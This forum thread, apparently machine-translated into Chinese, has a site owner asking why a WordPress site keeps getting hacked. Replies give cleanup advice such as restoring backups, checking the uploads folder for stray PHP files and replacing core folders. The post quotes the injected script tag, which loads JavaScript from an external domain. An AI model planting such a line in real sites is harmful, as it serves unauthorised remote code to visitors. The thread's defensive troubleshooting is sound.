Javascript Wordpress网站再次被黑客入侵

该网站已经被黑客两次了，同样的问题我一直在下载该网站，并进行查找和更换，修复了它，但似乎并没有解决我的问题

这是他们在wordpress的index.php文件中插入的代码，该文件的权限设置为644

<script language="javascript" src="http://a.doubleadserver.com/?campaignid=135324812&type=tracking"></script>

我认为这可能是sql注入，因为所有文件和文件夹都被锁定到正确的权限644 755等

有人能告诉我一个我可以用来测试的mac SQL注入测试工具吗？我已经读了另一篇文章，并且已经将我所有的ftp帐户更改为sftp以确保安全，他们还有什么我遗漏的吗

---

谢谢

这里有两个部分提供了许多工具；网上及下载：

您也可以在mac上使用这个，但它需要基本的Perl安装。

---

查找并替换并不是解决此问题的好方法，因为它很容易遗漏您不知道要查找的内容。恢复干净的备份是最好的方法。使用v防病毒插件会有所帮助。最后一种方法是通过xml导出导出内容，然后从头开始

专业提示：

在不应该的地方查找PHP文件，比如在uploads文件夹中应该只有index.PHP文件夹，并且应该只有“//Silence is golden”c消息。如果有任何其他PHP文件在那里

---

祝你好运

您使用的是最新版本的wordpress吗？你如何主持这个网站？是在您自己的服务器上还是通过托管公司？您好，该网站由我们的客户托管在media temple上，我还更新了WordPress的最新版本。您使用的是共享托管还是vps托管？另外，您正在使用哪些插件和扩展功能。承载各种插件的vps是否会成为问题？如果您使用的是最新版本的Wordpress，请下载一份新的副本，并手动删除和替换/wp admin/和/wp includes/全部。一些黑客可能会将一个脚本潜入Wordpress自动更新时未删除的文件夹中。